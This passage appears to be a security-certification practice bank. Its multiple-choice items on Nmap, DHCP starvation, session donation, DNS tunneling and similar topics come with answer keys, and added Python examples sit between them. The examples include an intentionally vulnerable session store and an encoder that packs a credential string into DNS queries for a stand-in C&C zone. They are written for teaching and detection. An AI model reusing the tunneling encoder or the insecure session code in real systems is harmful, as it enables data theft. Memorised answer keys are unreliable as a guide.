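from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed log lines (not real data): "<source> <local timestamp> <message>".
# True sequence: SSH connection allowed, IDS sees the brute force, then the
# compromised host pulls a tool through the proxy. Only the firewall is on NTP.
RAW_LOGS = [
    "proxy    2016-03-01T07:31:40 GET http://updates.example.net/agent.exe from 10.249.253.15",
    "firewall 2016-03-01T07:33:28 ALLOW tcp 10.240.250.23:54373 -> 10.249.253.15:22",
    "ids      2016-03-01T07:36:05 ALERT SSH brute force 10.240.250.23 -> 10.249.253.15",
]

# Seconds to ADD to each source's timestamps, measured with clock_offset() against
# a trusted reference before the analysis. An empty mapping means no correction.
MEASURED_OFFSETS = {"firewall": 0, "proxy": 180, "ids": -120}

# What the proxy's clock showed at the moment the reference clock read 07:34:40.
PROXY_SHOWED = datetime(2016, 3, 1, 7, 31, 40)
REFERENCE_READ = datetime(2016, 3, 1, 7, 34, 40)


@dataclass
class Event:
    source: str
    local_time: datetime
    message: str


def parse_line(line: str) -> Event:
    source, stamp, message = line.split(maxsplit=2)
    return Event(source, datetime.fromisoformat(stamp), message)


def clock_offset(device_time: datetime, reference_time: datetime) -> int:
    """Seconds to add to a device's timestamps so they agree with the reference."""
    return int((reference_time - device_time).total_seconds())


def correlate(lines, offsets):
    """Events ordered by corrected time: local time plus the source's offset."""
    events = [parse_line(line) for line in lines]

    def corrected(event):
        return event.local_time + timedelta(seconds=offsets.get(event.source, 0))

    return sorted(events, key=corrected)


def order_of_sources(lines, offsets):
    """Just the sequence of sources, which is what the investigator is trying to read."""
    return [event.source for event in correlate(lines, offsets)]
```

The offsets have to be measured and recorded before the logs are interpreted (and ideally eliminated altogether by NTP on every device); applying them afterwards only works while the drift is known and roughly constant, which is exactly the condition that does not hold for a clock that has been wrong for months.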

While performing an Nmap scan against a host, Paola determines the
existence of a firewall. In an attempt to determine whether the
firewall is stateful or stateless, which of the following options would
be best to use?

A. -sA

B. -sX

C. -sT

D. -sF

The correct answer(s): A

Joe works as an IT administrator in an organization and has recently
set up a cloud computing service for the organization. To implement
this service, he reached out to a telecom company for providing
Internet connectivity and transport services between the organization
and the cloud service provider. In the NIST cloud deployment reference
architecture, under which category does the telecom company fall in the
above scenario?

A. Cloud broker

B. Cloud consumer

C. Cloud carrier

D. Cloud auditor

The correct answer(s): C

Mike, a security engineer, was recently hired by BigFox Ltd. The
company recently experienced disastrous DoS attacks. The management
had instructed Mike to build defensive strategies for the company's IT
infrastructure to thwart DoS/DDoS attacks. Mike deployed some
countermeasures to handle jamming and scrambling attacks. What is the
countermeasure Mike applied to defend against jamming and scrambling
attacks?

A. Allow the usage of functions such as gets and strcpy

B. Allow the transmission of all types of addressed packets at the ISP
level

C. Implement cognitive radios in the physical layer

D. Disable TCP SYN cookie protection

The correct answer(s): C

Tony is a penetration tester tasked with performing a penetration test.
After gaining initial access to a target system, he finds a list of
hashed passwords. Which of the following tools would not be useful for
cracking the hashed passwords?

A. John the Ripper

B. Hashcat

C. netcat

D. THC-Hydra

The correct answer(s): C

While examining audit logs, you discover that people are able to telnet
into the SMTP server on port 25. You would like to block this, though
you do not see any evidence of an attack or other wrongdoing. However,
you are concerned about affecting the normal functionality of the email
server. From the following options, choose how best you can achieve
this objective.

A. Block port 25 at the firewall

B. Shut off the SMTP service on the server

C. Force all connections to use a username and password

D. Switch from Windows Exchange to UNIX Sendmail

E. None of the above

The correct answer(s): E

A friend of yours tells you that he downloaded and executed a file that
was sent to him by a coworker. Since the file did nothing when
executed, he asks you for help because he suspects that he may have
installed a trojan on his computer. What tests would you perform to
determine whether his computer is infected?

A. Use ExifTool and check for malicious content.

B. You do not check; rather, you immediately restore a previous
snapshot of the operating system.

C. Upload the file to VirusTotal.

D. Use netstat and check for outgoing connections to strange IP
addresses or domains.

The correct answer(s): D


Stephen, an attacker, targeted the industrial control systems of an
organization. He generated a fraudulent email with a malicious
attachment and sent it to employees of the target organization. An
employee who manages the sales software of the operational plant opened
the fraudulent email and clicked on the malicious attachment. This
resulted in the malicious attachment being downloaded and malware being
injected into the sales software maintained in the victim's system.
Further, the malware propagated itself to other networked systems,
finally damaging the industrial automation components. What is the
attack technique used by Stephen to damage the industrial systems?

A. Spear-phishing attack

B. SMishing attack

C. Reconnaissance attack

D. HMI-based attack

The correct answer(s): A

Boney, a professional hacker, targets an organization for financial
benefits. He performs an attack by sending his session ID using an MITM
attack technique. Boney first obtains a valid session ID by logging
into a service and later feeds the same session ID to the target
employee. The session ID links the target employee to Boney's account
page without disclosing any information to the victim. When the target
employee clicks on the link, all the sensitive payment details entered
in a form are linked to Boney's account. What is the attack performed
by Boney in the above scenario?

A. Session donation attack

B. Session fixation attack

C. Forbidden attack

D. CRIME attack

The correct answer(s): A
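The Boney scenario in code, as an added example that is not part of the original question bank: a session store that accepts any session ID a client presents (so the victim lands in Boney's authenticated session) beside one that issues its own IDs only, binds each session to the client that obtained it and rotates the ID on login, which also closes the fixation variant. The class and method names and the "client" identifier are assumptions for illustration; a real deployment would derive the client binding from something more stable than a source IP.

```python
import secrets


class VulnerableSessions:
    """Accepts any session ID the client presents and keeps it across login."""

    def __init__(self):
        self._accounts = {}  # session id -> account name (None = not logged in)

    def new_session(self):
        sid = secrets.token_urlsafe(32)
        self._accounts[sid] = None
        return sid

    def login(self, sid, account):
        self._accounts[sid] = account  # same ID before and after authentication
        return sid

    def whoami(self, sid, client=None):
        return self._accounts.get(sid)  # whoever presents the ID owns the session


class HardenedSessions:
    """Same API with three changes: IDs are issued only by the server, every session
    is bound to the client that obtained it, and the ID is rotated on login."""

    def __init__(self):
        self._sessions = {}  # session id -> {"account": ..., "client": ...}

    def new_session(self, client):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"account": None, "client": client}
        return sid

    def login(self, sid, client, account):
        entry = self._sessions.pop(sid, None)  # the old ID dies on privilege change
        if entry is None or entry["client"] != client:
            raise PermissionError("unknown session or wrong client")
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"account": account, "client": client}
        return new_sid

    def whoami(self, sid, client):
        entry = self._sessions.get(sid)
        if entry is None or entry["client"] != client:
            return None
        return entry["account"]


def donation_against_vulnerable():
    """Boney logs in, then hands his authenticated ID to the victim in a link."""
    store = VulnerableSessions()
    sid = store.login(store.new_session(), "boney")
    # The victim's browser follows the link carrying Boney's session ID ...
    return store.whoami(sid, client="victim-browser")  # "boney": the form is Boney's


def donation_against_hardened():
    store = HardenedSessions()
    sid = store.login(store.new_session("boney-browser"), "boney-browser", "boney")
    return store.whoami(sid, client="victim-browser")  # None: bound to Boney's client


def fixation_against_hardened():
    """Fixation variant: an unauthenticated ID is planted on the victim, who then
    logs in with it. Returns (planted ID still valid?, victim received a new ID?)."""
    store = HardenedSessions()
    planted = store.new_session("victim-browser")  # assume the attacker learned it
    fresh = store.login(planted, "victim-browser", "victim")
    return store.whoami(planted, "victim-browser") is not None, fresh != planted
```

Binding alone is a partial control: the essential fixes are that session IDs are never accepted from URL parameters (cookie only, `HttpOnly` and `SameSite`), that the ID is regenerated on every change of privilege, and that a form accepting payment details shows the user which account it belongs to and re-authenticates for sensitive actions.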

To create a botnet, the attacker can use several techniques to scan
for vulnerable machines. The attacker first collects information about
a large number of vulnerable machines to create a list. Subsequently,
they infect the machines. The list is divided by assigning half of the
list to the newly compromised machines. The scanning process runs
simultaneously. This technique ensures the spreading and installation
of malicious code in little time. Which technique is discussed here?

A. Hit-list scanning technique

B. Topological scanning technique

C. Subnet scanning technique

D. Permutation scanning technique

The correct answer(s): A

Harper, a software engineer, is developing an email application. To
ensure the confidentiality of email messages, Harper uses a
symmetric-key block cipher having a classical 12- or 16-round Feistel
network with a block size of 64 bits for encryption, which includes
large 8 x 32-bit S-boxes (S1, S2, S3, S4) based on bent functions,
modular addition and subtraction, key-dependent rotation, and XOR
operations. This cipher also uses a masking key (Km1) and a rotation
key (Kr1) for performing its functions. What is the algorithm employed
by Harper to secure the email messages?

A. CAST-128

B. AES

C. GOST block cipher

D. DES

The correct answer(s): A

Which of the following statements is FALSE with respect to Intrusion
Detection Systems?

A. Intrusion Detection Systems can be configured to distinguish
specific content in network packets

B. Intrusion Detection Systems can easily distinguish a malicious
payload in encrypted traffic

C. Intrusion Detection Systems require constant updates of the
signature library

D. Intrusion Detection Systems can examine the contents of the data in
the context of the network protocol

The correct answer(s): B

Susan, a software developer, wants her web API to update other
applications with the latest information. For this purpose, she uses
user-defined HTTP callbacks or push APIs that are raised based on
trigger events; when invoked, this feature supplies data to other
applications so that users can instantly receive real-time information.
Which of the following techniques is employed by Susan?

A. Web shells

B. Webhooks

C. REST API

D. SOAP API

The correct answer(s): B


In this form of encryption algorithm, every individual block contains
64-bit data, and three keys are used, where each key consists of 56
bits. Which is this encryption algorithm?

A. IDEA

B. Triple Data Encryption Standard

C. MD5 encryption algorithm

D. AES

The correct answer(s): B

A network admin contacts you. He is concerned that ARP spoofing or
poisoning might occur on his network. What are some things he can do
to prevent it? Select the best answers.

A. Use port security on his switches.

B. Use a tool like ARPwatch to monitor for strange ARP activity.

C. Use a firewall between all LAN segments.

D. If you have a small network, use static ARP entries.

E. Use only static IP addresses on all PCs.

The correct answer(s): A B D

There are multiple cloud deployment options depending on how isolated
a customer's resources are from those of other customers. Shared
environments share the costs and allow each customer to enjoy lower
operating expenses. One solution is for a customer to join with a group
of users or organizations to share a cloud environment. What is this
cloud deployment option called?

A. Hybrid

B. Community

C. Public

D. Private

The correct answer(s): B

Abel, a security professional, conducts penetration testing in his
client organization to check for any security loopholes. He launched an
attack on the DHCP servers by broadcasting forged DHCP requests and
leased all the DHCP addresses available in the DHCP scope until the
server could not issue any more IP addresses. This led to a DoS attack,
and as a result, legitimate employees were unable to access the
client's network. Which of the following attacks did Abel perform in
the above scenario?

A. VLAN hopping

B. DHCP starvation

C. Rogue DHCP server attack

D. STP attack

The correct answer(s): B

DHCP snooping is a great solution to prevent rogue DHCP servers on your
network. Which security feature on switches leverages the DHCP snooping
database to help prevent man-in-the-middle attacks?

A. Spanning tree

B. Dynamic ARP Inspection (DAI)

C. Port security

D. Layer 2 Attack Prevention Protocol (LAPP)

The correct answer(s): B

What ports should be blocked on the firewall to prevent NetBIOS traffic
from coming through the firewall if your network is comprised of
Windows NT, 2000, and XP?

A. 110

B. 135

C. 139

D. 161

E. 445

F. 1024

The correct answer(s): B C E

John, a professional hacker, performs a network attack on a renowned
organization and gains unauthorized access to the target network. He
remains in the network without being detected for a long time and
obtains sensitive information without sabotaging the organization.
Which of the following attack techniques is used by John?

A. Advanced persistent threat

B. Diversion theft

C. Spear-phishing sites

D. Insider threat

The correct answer(s): A

Which DNS resource record can indicate how long any "DNS poisoning"
could last?

A. MX

B. SOA

C. NS

D. TIMEOUT

The correct answer(s): B

Tremp is an IT Security Manager, and he is planning to deploy an IDS in
his small company. He is looking for an IDS with the following
characteristics:

- Verifies success or failure of an attack
- Monitors system activities
- Detects attacks that a network-based IDS fails to detect
- Near real-time detection and response
- Does not require additional hardware
- Lower entry cost

Which type of IDS is best suited for Tremp's requirements?

A. Gateway-based IDS

B. Network-based IDS

C. Host-based IDS

D. Open source-based

The correct answer(s): C

Dorian is sending a digitally signed email to Polly. With which key is
Dorian signing this message and how is Polly validating it?

A. Dorian is signing the message with his public key, and Polly will
verify that the message came from Dorian by using Dorian's private key.

B. Dorian is signing the message with Polly's public key, and Polly
will verify that the message came from Dorian by using Dorian's public
key.

C. Dorian is signing the message with his private key, and Polly will
verify that the message came from Dorian by using Dorian's public key.

D. Dorian is signing the message with Polly's private key, and Polly
will verify that the message came from Dorian by using Dorian's public
key.

The correct answer(s): C

John, a professional hacker, decided to use DNS to perform data
exfiltration on a target network. In this process, he embedded
malicious data into DNS protocol packets that even DNSSEC cannot
detect. Using this technique, John successfully injected malware to
bypass a firewall and maintained communication between the victim
machine and the C&C server. What is the technique employed by John to
bypass the firewall?

A. DNS cache snooping

B. DNSSEC zone walking

C. DNS tunneling method

D. DNS enumeration

The correct answer(s): C
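How the data rides inside the DNS names in John's technique, and what a defender can look for, as an added example that is not part of the original question bank: an encoder that splits a payload into base32 subdomain labels under an attacker-controlled zone, the matching reassembly on the C&C side, and two detection heuristics run over a constructed query log. The zone `c2.example.net`, the secret string and the thresholds are assumptions. DNSSEC is irrelevant to this detection: it authenticates records, it does not inspect what a queried name contains.

```python
import base64
import math
from collections import Counter, defaultdict

ZONE = "c2.example.net"  # assumed attacker-controlled zone (the C&C is its nameserver)


def encode_for_dns(data: bytes, zone: str = ZONE, chunk: int = 20) -> list:
    """Split base32 text into queries '<seq>.<chunk>.<zone>'. Base32 is used because
    DNS names are case-insensitive and each label must be at most 63 characters."""
    text = base64.b32encode(data).decode().rstrip("=").lower()
    return [f"{i:03d}.{text[i * chunk:(i + 1) * chunk]}.{zone}"
            for i in range((len(text) + chunk - 1) // chunk)]


def decode_from_dns(names: list, zone: str = ZONE) -> bytes:
    """Reassemble on the C&C side: strip the zone, order by the sequence label."""
    parts = []
    for name in names:
        seq, payload = name[: -len(zone) - 1].split(".", 1)
        parts.append((int(seq), payload))
    text = "".join(payload for _, payload in sorted(parts)).upper()
    text += "=" * (-len(text) % 8)  # restore base32 padding
    return base64.b32decode(text)


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(qname: str, min_label: int = 20, min_entropy: float = 3.0) -> bool:
    """Per-query heuristic: a long, high-entropy label is typical of encoded payloads."""
    label = max(qname.split("."), key=len)
    return len(label) >= min_label and shannon_entropy(label) >= min_entropy


def suspicious_zones(qnames: list, min_unique: int = 5) -> set:
    """Aggregate heuristic: many distinct names under one parent zone in a window.
    The parent zone is taken as the last three labels (an assumption for this demo)."""
    unique = defaultdict(set)
    for q in qnames:
        labels = q.split(".")
        if len(labels) >= 3:
            unique[".".join(labels[-3:])].add(q)
    return {zone for zone, names in unique.items() if len(names) >= min_unique}


# Constructed sample: a 62-byte secret (five 20-character chunks) mixed into
# ordinary-looking queries. None of this is real traffic.
SECRET = b"user=admin;pass=hunter2;host=db01.lan;token=9f3a1c7e2b5d4086aa"
NORMAL_QUERIES = ["www.example.com", "mail.example.com", "api.github.com",
                  "cdn01.static.example.net", "time.cloudflare.com"]
TUNNEL_QUERIES = encode_for_dns(SECRET)
QUERY_LOG = NORMAL_QUERIES + TUNNEL_QUERIES
```

Both heuristics have false positives on their own (CDN and cloud hostnames are long and high-entropy; a busy SaaS zone has many subdomains), which is why production detections combine label statistics, unique-name counts per zone, query volume and record type (TXT and NULL responses carry the downstream channel) and maintain an allowlist of known-noisy zones.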

Jack, a professional hacker, targets an organization and performs
vulnerability scanning on the target web server to identify any
possible weaknesses, vulnerabilities, and misconfigurations. In this
process, Jack uses an automated tool that eases his work and performs
vulnerability scanning to find hosts, services, and other
vulnerabilities in the target server. Which of the following tools is
used by Jack to perform vulnerability scanning?

A. Infoga

B. WebCopier Pro

C. Netsparker

D. NCollector Studio

The correct answer(s): C

Infecting a system with malware and using phishing to gain credentials
to a system or web application are examples of which phase of the
ethical hacking methodology?

A. Reconnaissance

B. Maintaining access

C. Scanning

D. Gaining access

The correct answer(s): D

Which of the following tools performs comprehensive tests against web
servers, including dangerous files and CGIs?

A. Nikto

B. John the Ripper

C. Dsniff

D. Snort

The correct answer(s): A

What is the known-plaintext attack used against DES which gives the
result that encrypting plaintext with one DES key followed by
encrypting it with a second DES key is no more secure than using a
single key?

A. Man-in-the-middle attack

B. Meet-in-the-middle attack

C. Replay attack

D. Traffic analysis attack

The correct answer(s): B
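The meet-in-the-middle attack carried out in full, as an added example that is not part of the original question bank. DES keys are too large to tabulate here, so the attack runs against a toy 16-bit ARX block cipher constructed for this purpose: double encryption with two 16-bit keys nominally offers 2^32 work, but the table-based attack costs about 2 * 2^16 cipher calls plus verification, exactly the reason two-key double DES is rated at roughly 2^57 rather than 2^112 and why 3DES exists. The cipher, its round constants and the sample keys are assumptions for illustration.

```python
MASK = 0xFFFF
ROUND_CONSTS = [0x9E37, 0x79B9, 0x7F4A, 0x7C15]  # arbitrary per-round constants


def rotl(x, r):
    return ((x << r) | (x >> (16 - r))) & MASK


def rotr(x, r):
    return ((x >> r) | (x << (16 - r))) & MASK


def round_key(key, r):
    return rotl(key, (3 * r) % 16) ^ ROUND_CONSTS[r]


def encrypt(key, block):
    """Toy 16-bit ARX cipher: add round key, rotate, xor round key, four rounds."""
    x = block & MASK
    for r in range(len(ROUND_CONSTS)):
        rk = round_key(key, r)
        x = rotl((x + rk) & MASK, 5) ^ rk
    return x


def decrypt(key, block):
    x = block & MASK
    for r in reversed(range(len(ROUND_CONSTS))):
        rk = round_key(key, r)
        x = (rotr(x ^ rk, 5) - rk) & MASK
    return x


def double_encrypt(k1, k2, block):
    return encrypt(k2, encrypt(k1, block))


def meet_in_the_middle(pairs):
    """pairs: known (plaintext, ciphertext) pairs under the same unknown (k1, k2).
    Returns every (k1, k2) consistent with all of them. Cost: 2**16 encryptions to
    build the table, 2**16 decryptions to probe it, then verification of the
    candidates, instead of 2**32 double encryptions for brute force."""
    p0, c0 = pairs[0]
    forward = {}                                 # E_k1(p0) -> [k1, ...]
    for k1 in range(1 << 16):
        forward.setdefault(encrypt(k1, p0), []).append(k1)
    candidates = []
    for k2 in range(1 << 16):                    # D_k2(c0) must meet the table
        for k1 in forward.get(decrypt(k2, c0), ()):
            candidates.append((k1, k2))
    # A 16-bit block cannot pin a 32-bit key pair: ~2**16 pairs survive the first
    # match, so the remaining known pairs are used to discard the false ones.
    return [(k1, k2) for k1, k2 in candidates
            if all(double_encrypt(k1, k2, p) == c for p, c in pairs[1:])]


# Assumed secret keys and a few known plaintexts (the attacker's view is KNOWN_PAIRS).
K1, K2 = 0x1F2E, 0xA5C3
PLAINTEXTS = [0x0000, 0x1234, 0xBEEF, 0x7777]
KNOWN_PAIRS = [(p, double_encrypt(K1, K2, p)) for p in PLAINTEXTS]


def recover_keys():
    return meet_in_the_middle(KNOWN_PAIRS)
```

Scaled to DES the same table has 2^56 entries, so memory rather than time is the practical limit; the time/memory trade-offs that follow are why standards treat two-key 3DES (2TDEA) as about 80 bits of security and three-key 3DES (3TDEA) as about 112, not 168.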

What is the first step for a hacker conducting a DNS cache poisoning
(DNS spoofing) attack against an organization?

A. The attacker queries a nameserver using the DNS resolver.

B. The attacker makes a request to the DNS resolver.

C. The attacker forges a reply from the DNS resolver.

D. The attacker uses TCP to poison the DNS resolver.

The correct answer(s): B

Which of the following Bluetooth hacking techniques does an attacker
use to send messages to users without the recipient's consent, similar
to email spamming?

A. Bluesmacking

B. BlueSniffing

C. Bluejacking

D. Bluesnarfing

The correct answer(s): C

(https://en.wikipedia.org/wiki/Bluejacking) Bluejacking is the sending
of unsolicited messages over Bluetooth to Bluetooth-enabled devices
such as mobile phones, PDAs or laptop computers, sending a vCard which
typically contains a message in the name field (i.e., for bluedating or
bluechat) to another Bluetooth-enabled device via the OBEX protocol.
Bluejacking is usually harmless, but because bluejacked people
generally don't know what has happened, they may think that their
phone is malfunctioning. Usually, a bluejacker will only send a text
message, but with modern phones it's possible to send images or sounds
as well. Bluejacking has been used in guerrilla marketing campaigns to
promote advergames. Bluejacking is also confused with Bluesnarfing,
which is the way in which mobile phones are illegally hacked via
Bluetooth.

When a security analyst prepares for the formal security assessment,
which of the following should be done in order to determine
inconsistencies in the secure assets database and verify that the
system is compliant with the minimum security baseline?

A. Data items and vulnerability scanning

B. Interviewing employees and network engineers

C. Reviewing the firewalls' configuration

D. Source code review

The correct answer(s): A

What type of vulnerability/attack is it when the malicious person
forces the user's browser to send an authenticated request to a server?

A. Session hijacking

B. Server-side request forgery

C. Cross-site request forgery

D. Cross-site scripting

The correct answer(s): C

Robin, a professional hacker, targeted an organization's network to
sniff all of its traffic. During this process, Robin connected a rogue
switch to an unused port on the LAN with a priority lower than that of
any other switch in the network so that he could make it the root
bridge, which would later allow him to sniff all the traffic on the
network. What is the attack performed by Robin in the above scenario?

A. ARP spoofing attack

B. VLAN hopping attack

C. DNS poisoning attack

D. STP attack

The correct answer(s): D
